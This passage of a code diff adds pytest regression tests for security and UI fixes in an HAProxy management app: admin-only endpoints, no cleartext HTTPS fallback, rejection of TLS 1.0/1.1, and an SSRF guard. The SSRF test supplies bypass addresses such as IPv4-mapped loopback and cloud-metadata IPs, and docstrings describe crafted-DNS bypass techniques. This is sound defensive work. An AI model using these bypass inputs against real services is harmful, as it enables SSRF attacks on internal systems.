# =====================================================================
# M4 — handleCancel Modal must reject mask / keyboard dismissal
# =====================================================================
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_cancel_modal_disables_keyboard_and_mask():
src = (_FRONT / "components" / "SiteWizard.js").read_text()
# Locate the handleCancel function block.
cancel_start = src.find("const handleCancel = ()")
assert cancel_start >= 0
cancel_end = src.find("};", cancel_start)
block = src[cancel_start:cancel_end]
assert "keyboard: false" in block, (
"R18c-#36 regression: handleCancel modal must disable keyboard "
"(Esc) dismissal so it does not silently invoke Save Draft"
)
assert "maskClosable: false" in block, (
"R18c-#36 regression: handleCancel modal must disable mask click "
"dismissal for the same reason"
)
# =====================================================================
# M5 — fetchInitial surfaces failures
# =====================================================================
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_fetch_initial_no_silent_catch():
"""Phase K Phase D update: the wizard's `fetchInitial` no longer
duplicates the cluster fetch — `useCluster()` (shared
ClusterContext) is the single source of truth for the cluster
list now. The LE accounts fetch remains wizard-local because no
other page needs it. The pin therefore:
* still forbids the silent `catch (_e) {}` swallow,
* still requires LE account failures to surface as info,
* REMOVES the (now-impossible) cluster-fetch-failure pin
because there is no cluster fetch left in this function.
"""
src = (_FRONT / "components" / "SiteWizard.js").read_text()
# Find the fetchInitial body.
start = src.find("const fetchInitial = useCallback(async ()")
assert start >= 0
# The function ends at the `}, []);` that closes the useCallback.
end = src.find("}, []);", start)
block = src[start:end]
# The legacy silent catch block must be gone.
assert "catch (_e) {" not in block, (
"R18c-#37 regression: fetchInitial must not swallow errors via "
"an empty catch block"
)
# LE accounts surfacing remains required.
assert "message.info(extractApiError(acmeRes.reason" in src, (
"R18c-#37 regression: LE accounts fetch failure must produce a "
"user-visible info message"
)
# Phase K Phase D: the wizard MUST NOT duplicate the
# /api/clusters fetch. ClusterContext owns it.
assert "axios.get('/api/clusters')" not in block, (
"Phase K Phase D (Bulgu #1) regression: fetchInitial is "
"back to duplicating the /api/clusters fetch. That doubles "
"cluster-manager load and races ClusterContext's hydration."
)
# =====================================================================
# M8 — apply_immediately coercion moved out of render path
# =====================================================================
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_acme_apply_coercion_in_useeffect_not_settimeout():
src = (_FRONT / "components" / "SiteWizard.js").read_text()
# The render-time setTimeout that mutated form state must be gone.
bad = "setTimeout(() => form.setFieldsValue({ apply_immediately: true }), 0)"
assert bad not in src, (
"R18c-#38 regression: setTimeout-in-render apply_immediately "
"coercion must be replaced by a useEffect"
)
# And there must be a useEffect dependent on sslMode that performs
# the coercion.
needle_effect = "useEffect(() => {\n if (sslMode === 'acme') {"
needle_set = "form.setFieldsValue({ apply_immediately: true });"
assert needle_effect in src, (
"R18c-#38 regression: missing sslMode-keyed useEffect that "
"coerces apply_immediately when ssl.mode == 'acme'"
)
# Make sure the coercion still runs (idempotently).
assert needle_set in src, (
"useEffect must still call setFieldsValue to flip "
"apply_immediately"
)
@@ -0,0 +1,201 @@
"""v1.5.0 R18c round 2 audit fixes — UI page integrity tests.
Findings discovered during R18c round 2 (UI pages impact):
R18c-#5 (BackendServers SSL fields stale on toggle off — KRITIK):
Pre-fix when the operator toggled `ssl_enabled` from true to
false in the server edit modal, the SSL Form.Items unmounted
and Ant Design did NOT include their values in the submit
payload. The backend PUT only updated fields PRESENT in the
payload, so the existing DB row kept its stale
ssl_certificate_id / ssl_verify / ssl_sni / ssl_min_ver /
ssl_max_ver / ssl_ciphers — HAProxy then rendered a server
line where SSL was "off" but with the leftover certificate
path, producing inconsistent behaviour. handleServerSubmit now
explicitly nulls the SSL fields when ssl_enabled is false.
R18c-#6 (BulkVersionHistory: wizard versions get Restore +
formatted name): pre-fix `bulk-proxied-host-create-{ts}`
versions were displayed as raw timestamped strings with no
"what is this?" hint, AND the Restore button only appeared
for `apply-consolidated` versions. The operator who applied a
wizard PENDING and later wanted to roll back had no UI path.
formatVersionName now returns "New Site (wizard) - {raw}" and
the Restore predicate accepts the wizard prefix.
R18c-#7 (UserManagement audit Details summary): pre-fix
importantKeys lacked the wizard's degraded-outcome fields
(wizard_status, apply_error, acme_staging_error, version_name,
ssl_mode), so the truncated table cell defaulted to alphabetical
keys and the operator only saw the wizard outcome by opening
the JSON tooltip. Now the wizard fields appear first.
R18c-#8 (UserManagement Activity rowKey collision): pre-fix
`rowKey="timestamp"` produced duplicate React keys when burst
logging happened in the same second (e.g. wizard create + ACME
staging event). Replaced with a composite (id || timestamp +
action + resource_id).
R18c-#9 (SSLManagement delete error message): pre-fix raw string
concatenation against `error.response?.data?.detail` produced
"[object Object]" when FastAPI returned validation errors as a
list. Now uses the shared `extractApiError` helper.
"""
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
# ----------------- R18c-#5: SSL fields cleared on submit -----------------
def test_backend_servers_clears_ssl_fields_when_disabled():
src = (_FRONT / "components" / "BackendServers.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# The cleanup logic must explicitly null all SSL-related fields
# when ssl_enabled is false.
assert "if (!requestData.ssl_enabled)" in body, (
"R18c-#5 KRITIK regression: handleServerSubmit no longer "
"guards against stale SSL fields when ssl_enabled is "
"toggled off"
)
for f in (
"ssl_certificate_id",
"ssl_verify",
"ssl_sni",
"ssl_min_ver",
"ssl_max_ver",
"ssl_ciphers",
):
# The cleanup loop must list every SSL-related field.
assert f"'{f}'" in body, (
f"R18c-#5 KRITIK regression: SSL field '{f}' no longer "
"explicitly nulled when ssl_enabled=false — DB row "
"keeps stale value, HAProxy emits inconsistent server "
"line"
)
# ----------------- R18c-#6: wizard versions in BulkVersionHistory -----------------
def test_bulk_version_history_formats_wizard_version_name():
src = (_FRONT / "components" / "BulkVersionHistory.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
assert "bulk-site-create-" in body, (
"R18c-#6 regression: formatVersionName no longer recognises "
"the wizard's current `bulk-site-create-` prefix"
)
assert "bulk-proxied-host-create-" in body, (
"R18c-#6 regression: formatVersionName must ALSO keep "
"recognising the legacy `bulk-proxied-host-create-` prefix "
"so historical APPLIED versions still render with a human "
"label after the rename"
)
assert "New Site (wizard)" in body, (
"R18c-#6 regression: formatVersionName no longer surfaces a "
"human label for wizard versions"
)
def test_bulk_version_history_allows_restore_of_wizard_versions():
src = (_FRONT / "components" / "BulkVersionHistory.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# The Restore predicate must accept the wizard bulk prefix.
# Locate the predicate by finding the restore Popconfirm scope.
restore_block = body[body.find("Restore Configuration Version"):]
restore_block = body[
max(0, body.find("Restore Configuration Version") - 600):
body.find("Restore Configuration Version") + 200
]
assert "bulk-site-create-" in restore_block, (
"R18c-#6 regression: BulkVersionHistory Restore button no "
"longer surfaces for current-naming wizard bulk versions — "
"operator cannot roll back to a previous applied state from "
"this page after a wizard apply"
)
assert "bulk-proxied-host-create-" in restore_block, (
"R18c-#6 regression: BulkVersionHistory Restore predicate "
"must keep accepting the legacy `bulk-proxied-host-create-` "
"prefix so historical APPLIED versions remain restorable "
"after the rename"
)
# ----------------- R18c-#7 & #8: UserManagement activity table -----------------
def test_user_management_activity_includes_wizard_fields():
src = (_FRONT / "components" / "UserManagement.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# Important keys must include the wizard's degraded-outcome
# fields so the truncated cell highlights actual context.
for k in (
"'wizard_status'",
"'apply_error'",
"'acme_staging_error'",
"'version_name'",
"'ssl_mode'",
):
assert k in body, (
f"R18c-#7 regression: activity 'Details' summary no "
f"longer includes {k} — wizard outcome only visible "
"via JSON tooltip"
)
def test_user_management_activity_uses_composite_row_key():
src = (_FRONT / "components" / "UserManagement.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# Allow the deprecated pattern to appear inside comments (the
# R18c fix comment intentionally cites the legacy form). Strip
# line comments before the negative check.
code_only = "\n".join(
ln for ln in body.splitlines() if not ln.lstrip().startswith("//")
)
assert 'rowKey="timestamp"' not in code_only, (
"R18c-#8 regression: activity Table still uses "
"`rowKey=\"timestamp\"` — burst logging produces duplicate "
"React keys in the same second"
)
# Composite key must reference the row id and a fallback.
assert "rowKey={(r) =>" in body, (
"R18c-#8 regression: activity Table no longer uses a "
"composite rowKey function"
)
# ----------------- R18c-#9: SSLManagement extractApiError -----------------
def test_ssl_management_uses_extract_api_error_on_delete():
src = (_FRONT / "components" / "SSLManagement.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
assert "extractApiError" in body, (
"R18c-#9 regression: SSLManagement no longer imports the "
"shared extractApiError helper — error messages may render "
"as '[object Object]' on FastAPI validation errors"
)
# The pre-fix raw concatenation must be gone from the delete handler.
bad_pattern = "error.response?.data?.detail"
delete_block = body[body.find("Failed to delete certificate"):][:300]
assert bad_pattern not in delete_block, (
"R18c-#9 regression: delete-cert handler still concatenates "
"raw response.data.detail into the error toast"
)
@@ -0,0 +1,242 @@
"""v1.5.0 R18c round 3 audit fixes — API contract / config / SSRF tests.
Findings discovered during R18c round 3 (concurrency, SSRF,
graceful shutdown, HAProxy config validity, weak TLS):
R18c-#10 (Frontends bind UNIQUE — KRITIK concurrency): pre-fix
`check_bind_port_collision` ran a plain SELECT outside the
wizard transaction with no FOR UPDATE, and the schema had NO
uniqueness on (cluster_id, bind_address, bind_port). Two
concurrent wizards could both pass the check and both INSERT,
producing two active frontends bound to the same port —
HAProxy refused to reload and the cluster was wedged. Migration
`ensure_frontends_bind_unique_constraint` adds a partial
UNIQUE index that serializes the race; the wizard router's
UniqueViolationError handler (R18b round 3) maps duplicates
to a clean 409.
R18c-#11 (HTTPS cleartext fallback — KRITIK SECURITY): pre-fix
when `ssl_enabled=true` but no certificate path resolved
(deleted cert, ACME-deferred state) the config generator fell
through to `bind addr:port` (no `ssl` keyword), silently
downgrading the operator's HTTPS frontend to CLEARTEXT on the
same port. The fix omits the bind line entirely and emits an
ERROR log so the operator notices.
R18c-#12 (`verify required` without ca-file — KRITIK config
validity): pre-fix `verify required` was emitted verbatim even
if the referenced ssl_certificate_id resolved to no PEM,
producing a config that either failed reload or — worse —
silently fell through to system trust. The fix downgrades to
`verify none` with an ERROR log.
R18c-#13 (SSRF IPv4-mapped IPv6 — KRITIK SECURITY): pre-fix the
`_is_public_ip` guard tested `is_loopback / is_private` on
raw IPv6 addresses; an attacker who controlled a domain's
AAAA record could point it at `::ffff:127.0.0.1` (IPv4-mapped
loopback) or `::ffff:169.254.169.254` (cloud metadata) and
bypass the SSRF guard. Now the guard normalizes via
`.ipv4_mapped` before classification.
R18c-#14 (Shutdown drain for fire-and-forget audit): pre-fix
`shutdown_event` immediately closed the DB pool, so any
in-flight `asyncio.create_task(log_user_activity(...))`
background task hit "pool is closed" and dropped its row.
Now the shutdown drains pending tasks for up to 5s before
closing the pool.
R18c-#15 (Weak TLS — RFC 8996): pre-fix the wizard accepted
`TLSv1.0` / `TLSv1.1` for both server and HTTPS frontend
`ssl_min_ver` / `ssl_max_ver`. Both are formally deprecated.
The wizard now rejects them with a clear error.
"""
from pathlib import Path
import asyncio
import pytest
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18c-#10: bind UNIQUE migration -----------------
def test_frontends_bind_unique_migration_present():
src = (_REPO / "database" / "migrations.py").read_text()
assert "ensure_frontends_bind_unique_constraint" in src, (
"R18c-#10 KRITIK regression: bind unique migration "
"function `ensure_frontends_bind_unique_constraint` "
"missing — concurrent wizards can race-INSERT duplicate "
"binds"
)
assert "idx_frontends_active_bind_unique" in src, (
"R18c-#10 KRITIK regression: partial UNIQUE index name "
"missing — re-creating the index requires the literal "
"name to remain stable"
)
# The migration must be wired into the startup sequence.
assert "await ensure_frontends_bind_unique_constraint()" in src, (
"R18c-#10 KRITIK regression: bind unique migration not "
"called from startup — index will not be created on a "
"fresh deploy"
)
# ----------------- R18c-#11: HTTPS cleartext fallback -----------------
def test_haproxy_config_omits_bind_when_ssl_enabled_and_no_cert():
src = (_REPO / "services" / "haproxy_config.py").read_text()
# Locate the post-SSL fallback block.
fallback_idx = src.find("# If no SSL bind was added")
if fallback_idx == -1:
# The legacy comment may have been replaced by the new
# comment block — try a stable anchor on the new code.
fallback_idx = src.find("if not bind_added:")
assert fallback_idx != -1, "fallback block anchor missing"
block = src[fallback_idx:fallback_idx + 1200]
# The fix MUST have a guard against ssl_enabled=true falling
# through to a plain bind.
assert "ssl_enabled" in block, (
"R18c-#11 KRITIK SECURITY regression: cleartext-fallback "
"block no longer checks ssl_enabled — HTTPS frontends "
"with unresolved certs may degrade to plaintext on the "
"same port"
)
assert "SSL BIND OMITTED" in block or "refusing to emit" in block, (
"R18c-#11 KRITIK SECURITY regression: fallback no longer "
"OMITS the cleartext bind for ssl_enabled frontends"
)
# ----------------- R18c-#12: server `verify required` without ca-file -----------------
def test_haproxy_config_downgrades_verify_required_without_ca_file():
src = (_REPO / "services" / "haproxy_config.py").read_text()
# The downgrade branch must check has_ca_file.
assert "verify_lower in ('required', 'optional') and not has_ca_file" in src, (
"R18c-#12 KRITIK config validity regression: server-line "
"verify guard no longer downgrades to `verify none` when "
"the referenced ca-file did not resolve — HAProxy reload "
"may fail or silently fall through to system trust"
)
assert "CONFIG SSL DOWNGRADE" in src, (
"R18c-#12 regression: downgrade is no longer logged as "
"ERROR — operator loses the diagnostic trail"
)
# ----------------- R18c-#13: SSRF IPv4-mapped IPv6 -----------------
def test_is_public_ip_unwraps_ipv4_mapped_ipv6():
# Import the helper directly and assert behaviour.
import importlib
spec = importlib.util.spec_from_file_location(
"acme_diagnostics_test_import",
_REPO / "services" / "acme_diagnostics.py",
)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
# IPv4-mapped IPv6 loopback / private / link-local must be REJECTED.
assert mod._is_public_ip("::ffff:127.0.0.1") is False, (
"R18c-#13 KRITIK SSRF regression: ::ffff:127.0.0.1 "
"(IPv4-mapped loopback) classified as public — SSRF guard "
"bypass via crafted AAAA record"
)
assert mod._is_public_ip("::ffff:169.254.169.254") is False, (
"R18c-#13 KRITIK SSRF regression: ::ffff:169.254.169.254 "
"(cloud metadata IP via IPv4-mapped IPv6) classified as "
"public"
)
assert mod._is_public_ip("::ffff:10.0.0.5") is False, (
"R18c-#13 regression: IPv4-mapped RFC1918 classified as "
"public"
)
# And the existing public/private classifications must still
# work for the unwrapped forms.
assert mod._is_public_ip("127.0.0.1") is False
assert mod._is_public_ip("10.0.0.5") is False
assert mod._is_public_ip("8.8.8.8") is True
assert mod._is_public_ip("2606:4700:4700::1111") is True
# ----------------- R18c-#14: shutdown drains background tasks -----------------
def test_shutdown_drains_background_tasks_before_pool_close():
src = (_REPO / "main.py").read_text()
# Locate shutdown_event body.
sd_idx = src.find("async def shutdown_event")
assert sd_idx != -1
body = src[sd_idx:sd_idx + 3000]
assert "asyncio.all_tasks" in body, (
"R18c-#14 regression: shutdown_event no longer enumerates "
"pending background tasks before closing the DB pool — "
"fire-and-forget audit log writes can be lost"
)
assert "asyncio.wait" in body, (
"R18c-#14 regression: shutdown_event no longer waits for "
"pending tasks to finish"
)
# The drain must happen BEFORE close_database_pool.
drain_idx = body.find("asyncio.wait")
pool_close_idx = body.find("close_database_pool()")
assert 0 < drain_idx < pool_close_idx, (
"R18c-#14 regression: drain step is no longer ordered "
"before close_database_pool — closing the pool first "
"still loses background task writes"
)
# ----------------- R18c-#15: weak TLS rejection -----------------
def test_wizard_rejects_tls_1_0_and_1_1_on_servers():
from models.site_wizard import ServerStep
from pydantic import ValidationError
base = dict(
server_name="srv",
server_address="10.0.0.5",
server_port=8080,
)
for v in ("TLSv1.0", "TLSv1.1"):
with pytest.raises(ValidationError) as exc:
ServerStep(**base, ssl_enabled=True, ssl_min_ver=v)
assert "deprecated" in str(exc.value).lower() or "rfc 8996" in str(exc.value).lower(), (
f"R18c-#15 regression: server.ssl_min_ver={v} no "
"longer rejected with the RFC 8996 hint"
)
with pytest.raises(ValidationError):
ServerStep(**base, ssl_enabled=True, ssl_max_ver=v)
def test_wizard_rejects_tls_1_0_and_1_1_on_https_frontend():
from models.site_wizard import SSLChoice
from pydantic import ValidationError
for v in ("TLSv1.0", "TLSv1.1"):
with pytest.raises(ValidationError):
SSLChoice(mode="upload", ssl_min_ver=v)
with pytest.raises(ValidationError):
SSLChoice(mode="upload", ssl_max_ver=v)
def test_wizard_still_accepts_tls_1_2_and_1_3():
"""Sanity: the rejection is targeted, not blanket."""
from models.site_wizard import ServerStep, SSLChoice
base = dict(
server_name="srv",
server_address="10.0.0.5",
server_port=8080,
)
for v in ("TLSv1.2", "TLSv1.3"):
# Should not raise.
ServerStep(**base, ssl_enabled=True, ssl_min_ver=v)
ServerStep(**base, ssl_enabled=True, ssl_max_ver=v)
SSLChoice(mode="upload", ssl_min_ver=v)
SSLChoice(mode="upload", ssl_max_ver=v)
@@ -0,0 +1,106 @@
"""v1.5.0 R18c round 4 (convergence) audit fixes.
Findings discovered during R18c round 4 (regression on R18c 1-3 +
hard-untouched topics):
R18c-#16 (User-activity API exposes other users' rows — KRITIK
info leak): pre-fix `GET /api/users/user-activity` only checked
that the caller had a valid token, never that they were
authorized to see ANOTHER operator's stream. Any authenticated
user could omit `user_id` to fetch the entire activity log of
every operator on the platform — including admin apply rows
and (after R18b round 6) the wizard's `apply_error` /
`acme_staging_error` JSON. Admin-only listing now; non-admins
are limited to their own user_id and rejected on
cross-account requests.
R18c-#17 (SSRF dual-stack residual — KRITIK): pre-fix the
aiohttp ClientSession used the default connector, which did
its own dual-stack `getaddrinfo` and could connect via AAAA
even when the SSRF guard's `gethostbyname_ex` only saw IPv4.
A crafted DNS pair (benign public A + private/loopback AAAA)
could route the probe through the IPv6 path. Connector now
forced to family=AF_INET so the family the guard inspects
matches the family the connector uses.
R18c-#18 (Migration docstring overstated dedup): pre-fix the
docstring claimed the partial UNIQUE migration would
"deduplicate" legacy duplicates. In reality
`CREATE UNIQUE INDEX IF NOT EXISTS` only skips when the index
NAME already exists — duplicate ROW data still aborts index
creation. Operators reading the comment may have wrongly
expected auto-dedup. Docstring corrected with the manual
consolidation runbook.
"""
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18c-#16: user-activity admin guard -----------------
def test_user_activity_endpoint_blocks_cross_user_access_for_non_admin():
src = (_REPO / "routers" / "user.py").read_text()
# Locate the get_user_activity body.
fn_idx = src.find("async def get_user_activity")
assert fn_idx != -1
body = src[fn_idx:fn_idx + 3500]
assert "is_admin" in body, (
"R18c-#16 KRITIK info leak regression: user-activity "
"endpoint no longer reads is_admin — non-admins can "
"request another user's activity stream"
)
assert "Only administrators" in body or "status_code=403" in body, (
"R18c-#16 KRITIK info leak regression: cross-user request "
"no longer raises 403"
)
# Default-to-self for non-admins must be present.
assert "user_id = own_id" in body or "user_id = current_user" in body, (
"R18c-#16 regression: non-admins no longer default-scoped "
"to their own user_id when omitted"
)
# ----------------- R18c-#17: SSRF dual-stack residual -----------------
def test_check_port80_forces_ipv4_connector():
src = (_REPO / "services" / "acme_diagnostics.py").read_text()
# The aiohttp connector must force IPv4 family.
assert "TCPConnector(family=socket.AF_INET" in src, (
"R18c-#17 KRITIK SSRF regression: aiohttp connector no "
"longer forced to IPv4 — SSRF guard inspects IPv4-only "
"DNS but connector can dual-stack to AAAA, bypassing the "
"guard via crafted DNS pairs"
)
# ----------------- R18c-#18: migration docstring fix -----------------
def test_migration_docstring_no_longer_claims_auto_dedup():
src = (_REPO / "database" / "migrations.py").read_text()
fn_idx = src.find("async def ensure_frontends_bind_unique_constraint")
assert fn_idx != -1
block = src[fn_idx:fn_idx + 3500]
# The misleading "Idempotent: skips on legacy rows..." line must be gone.
# Allow the word 'idempotent' in any contextual sense, but the
# specific overstatement about deduplication MUST NOT remain.
assert (
"deduplicating with a logical-key keepalive" not in block
and "skips on legacy rows that already" not in block
), (
"R18c-#18 regression: migration docstring still claims "
"legacy duplicates are auto-deduplicated — operators may "
"deploy expecting auto-cleanup that never happens"
)
# The corrected runbook hint must be present.
assert "manually consolidate" in block.lower() or "operationally" in block.lower(), (
"R18c-#18 regression: corrected docstring no longer "
"documents the manual consolidation path operators must "
"take when the index creation aborts"
)
@@ -0,0 +1,101 @@
"""v1.5.0 R18c round 5 audit fixes — final convergence sweep.
Findings discovered during R18c round 5 (after R18c rounds 1-4):
R18c-#19 (`GET /api/users` info leak — KRITIK): pre-fix any
authenticated user could fetch the FULL user roster (username,
email, phone, full_name, is_admin, roles, cluster_ids,
timestamps). Mutations were already admin-only; the read path
now matches.
R18c-#20 (`GET /api/roles` info leak — KRITIK): pre-fix any
authenticated user could read the full RBAC layout —
permissions blob and cluster_ids per role. Invaluable
reconnaissance for privilege escalation. Now admin-only.
R18c-#21 (Wizard ignores `cluster.acme_enabled` — KRITIK
functional): pre-fix the wizard staged ACME orders against
clusters whose `acme_enabled` flag was false. The HAProxy
config generator only injects the `/.well-known/acme-challenge`
routing block when that flag is true, so the order's HTTP-01
validation always failed with no clear cause. The wizard now
rejects ACME staging on disabled clusters with a clear 400
pointing the operator at the cluster's ACME toggle.
"""
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18c-#19: get_users admin guard -----------------
def test_get_users_requires_admin():
src = (_REPO / "routers" / "user.py").read_text()
fn_idx = src.find("async def get_users")
assert fn_idx != -1
body = src[fn_idx:fn_idx + 1500]
assert "is_admin" in body, (
"R18c-#19 KRITIK info leak regression: GET /api/users no "
"longer checks is_admin — full operator roster (incl. "
"emails, is_admin flags) leaks to any authenticated caller"
)
assert "status_code=403" in body, (
"R18c-#19 regression: non-admin path no longer raises 403"
)
# ----------------- R18c-#20: get_roles admin guard -----------------
def test_get_roles_requires_admin():
src = (_REPO / "routers" / "user.py").read_text()
fn_idx = src.find("async def get_roles")
assert fn_idx != -1
body = src[fn_idx:fn_idx + 1500]
assert "is_admin" in body, (
"R18c-#20 KRITIK info leak regression: GET /api/roles no "
"longer checks is_admin — full RBAC permissions blob leaks "
"to any authenticated caller"
)
assert "status_code=403" in body, (
"R18c-#20 regression: non-admin path no longer raises 403"
)
# ----------------- R18c-#21: wizard respects cluster.acme_enabled -----------------
def test_wizard_rejects_acme_on_disabled_cluster():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# The wizard CREATE flow must SELECT acme_enabled before
# staging an ACME order.
create_idx = src.find("async def create_site")
assert create_idx != -1
body = src[create_idx:]
# The cluster acme_enabled SELECT must be inside the
# `body.ssl.mode == "acme"` branch.
acme_block_start = body.find('if body.ssl.mode == "acme":', body.find("ACME mode: resolve account"))
assert acme_block_start != -1, (
"R18c-#21 regression: ACME mode block anchor missing in "
"create_proxied_host — cannot verify cluster guard"
)
acme_block = body[acme_block_start:acme_block_start + 2500]
assert "acme_enabled FROM haproxy_clusters" in acme_block, (
"R18c-#21 KRITIK functional regression: wizard CREATE no "
"longer checks the cluster's acme_enabled flag before "
"staging an order — operators stage doomed orders that "
"fail HTTP-01 because the cluster does not route "
"/.well-known/acme-challenge"
)
assert "acme_enabled=false" in acme_block.lower() or "has acme_enabled=false" in acme_block, (
"R18c-#21 regression: error message no longer mentions the "
"cluster's flag, depriving operators of the actionable hint"
)
assert "status_code=400" in acme_block, (
"R18c-#21 regression: ACME-on-disabled-cluster no longer "
"raises 400"
)
@@ -0,0 +1,113 @@
"""v1.5.0 R18c round 6 audit fixes — anonymous-read endpoints.
Findings discovered during R18c round 6 (final convergence sweep):
R18c-#22 (`GET /api/frontends` accepted anonymous GETs — KRITIK
info leak): pre-fix the listener catalog was readable without a
JWT, exposing bind addresses, SSL cert IDs, ACL/redirect rules,
and ssl_verify configuration for every cluster. With wizard-
created rows now part of the catalog, an unauthenticated
reader could enumerate the platform's complete frontend
inventory. Now requires an authenticated caller; the React UI
already attaches the JWT via axios defaults so the change is
non-breaking.
R18c-#23 (`GET /api/backends` accepted anonymous GETs — KRITIK
info leak): same shape as #22 for backend topology — server
addresses, ports, ca-file paths, weights — including any rows
the wizard wired up.
R18c-#24 (`GET /api/clusters` accepted anonymous GETs — KRITIK
info leak): clusters are the backbone of cluster-scoped RBAC
elsewhere; pre-fix the endpoint leaked cluster topology
(stats socket, config paths, ACME flags, agent counts) without
any JWT. Now requires authentication so cluster-scoped
enumeration cannot be done as a passer-by.
"""
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
def _read(p):
return p.read_text()
def _function_block(src: str, name: str, *, tail: int = 2500) -> str:
idx = src.find(f"async def {name}")
assert idx != -1, f"function {name} not found"
return src[idx:idx + tail]
# ----------------- R18c-#22: GET /api/frontends auth -----------------
def test_get_frontends_requires_authorization():
src = _read(_REPO / "routers" / "frontend.py")
block = _function_block(src, "get_frontends")
assert "authorization: str = Header" in block, (
"R18c-#22 KRITIK info leak regression: GET /api/frontends "
"no longer accepts the Authorization header parameter — "
"guard removed?"
)
assert "get_current_user_from_token(authorization)" in block, (
"R18c-#22 KRITIK info leak regression: GET /api/frontends "
"no longer authenticates the caller — full listener "
"catalog leaks anonymously"
)
# ----------------- R18c-#23: GET /api/backends auth -----------------
def test_get_backends_requires_authorization():
src = _read(_REPO / "routers" / "backend.py")
# The backends function body is very long (extensive docstring +
# branching), so widen the read window to cover the auth guard.
block = _function_block(src, "get_backends", tail=4500)
assert "authorization: str = Header" in block, (
"R18c-#23 KRITIK info leak regression: GET /api/backends "
"no longer accepts the Authorization header parameter"
)
assert "get_current_user_from_token(authorization)" in block, (
"R18c-#23 KRITIK info leak regression: GET /api/backends "
"no longer authenticates the caller — backend server "
"addresses leak anonymously"
)
# ----------------- R18c-#24: GET /api/clusters auth -----------------
def test_get_clusters_requires_authorization():
src = _read(_REPO / "routers" / "cluster.py")
block = _function_block(src, "get_clusters", tail=4000)
assert "authorization: str = Header" in block, (
"R18c-#24 KRITIK info leak regression: GET /api/clusters "
"no longer accepts the Authorization header parameter"
)
assert "get_current_user_from_token(authorization)" in block, (
"R18c-#24 KRITIK info leak regression: GET /api/clusters "
"no longer authenticates the caller — cluster topology "
"(stats socket, config paths) leaks anonymously"
)
def test_get_cluster_by_id_requires_authorization():
"""R18c convergence: anonymous GET /api/clusters/{id} bypassed
the round 6 list guard by iterating IDs. Locked down for parity
with the list endpoint so the attack surface is symmetric."""
src = _read(_REPO / "routers" / "cluster.py")
block = _function_block(src, "get_cluster", tail=2500)
assert "authorization: str = Header" in block, (
"R18c convergence regression: GET /api/clusters/{id} no "
"longer accepts the Authorization header — anonymous "
"ID-iterate enumeration possible despite list endpoint guard"
)
assert "get_current_user_from_token(authorization)" in block, (
"R18c convergence regression: GET /api/clusters/{id} no "
"longer authenticates the caller"
)
@@ -0,0 +1,350 @@
"""v1.5.0 R18c round 7 audit fixes — admin RBAC bypass + draft UX.
Findings discovered during R18c round 7:
R18c-#26 (KRITIK): admin user receives "Insufficient permissions:
backend.create required" from the wizard's CREATE endpoint when the
role attached to that admin doesn't enumerate every granular
permission. Enterprise super-admin (`users.is_admin = TRUE`) MUST
bypass granular permission checks system-wide; pre-fix the helper
only consulted `roles.permissions`. Fix: `check_user_permission`
now short-circuits on `is_admin` (either via the optional
current_user kwarg or a single SELECT). Wizard CREATE callsites
pass `current_user=current_user` to skip the extra DB roundtrip.
R18c-#27 (UX): resuming a draft from /sites/drafts dropped the user
on the first wizard step (Cluster & Domains) even though every
field was already populated. Operator had to click Next four
times to reach Review & Apply. Fix: the hydrate effect now jumps
straight to the last step (`WIZARD_LAST_STEP = 4`); the existing
"Resumed from draft" Alert mentions the Previous button so the
operator can still go back and edit any earlier field.
R18c-#28 (UX): drafts list lacked a Preview action. Operators had to
Resume (and thereby take the wizard out of the drafts page) just
to see what the draft would create. Fix: new Preview button calls
/api/proxied-hosts/preview with the draft payload and renders
the would_create + warnings response in a modal — the same
contract that the live wizard's Preview step uses.
R18c-#29 (Drafts SSL display): drafts list showed a single "Expires"
column counting the draft TTL (created_at + 30 days). When a
draft selected an existing certificate with 191 days left,
operators read the 30-day TTL as a cert expiry and reported it
as a bug. Fix:
* GET /drafts response now includes ssl_cert_summary (batch
SELECT, no N+1) for drafts whose ssl.mode == 'existing'.
* Drafts UI gains a SSL/TLS column (mirroring
FrontendManagement's SSL/TLS column via getSSLExpiryInfo).
* The TTL column is renamed to "Draft Expires" so its meaning
is unambiguous.
"""
import re
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
_WIZARD_PATH = _FRONT / "components" / "SiteWizard.js"
_DRAFTS_PATH = _FRONT / "components" / "SiteDrafts.js"
# When the test suite is executed inside the backend-only Docker image
# (which is what the CI Dockerfile.test ships) the frontend tree isn't
# present, so the JS source-level assertions cannot run. Skip the
# module rather than fail loudly — backend assertions still run from
# their own per-test file scope.
_FRONTEND_AVAILABLE = _WIZARD_PATH.exists() and _DRAFTS_PATH.exists()
def _read(p: Path) -> str:
return p.read_text()
_skip_no_frontend = pytest.mark.skipif(
not _FRONTEND_AVAILABLE,
reason="frontend/src not present (backend-only test container) — "
"JS source-level assertions skipped",
)
# =====================================================================
# R18c-#26: admin-aware check_user_permission
# =====================================================================
def test_check_user_permission_has_admin_short_circuit():
"""The helper must accept `current_user` kwarg AND fall back to a
single SELECT is_admin lookup when the dict isn't supplied."""
src = _read(_REPO / "auth_middleware.py")
# Find the function definition so we don't accidentally match other
# mentions of `is_admin` elsewhere in the module.
idx = src.find("async def check_user_permission(")
assert idx != -1, (
"R18c-#26 regression: check_user_permission helper missing"
)
block = src[idx:idx + 3000]
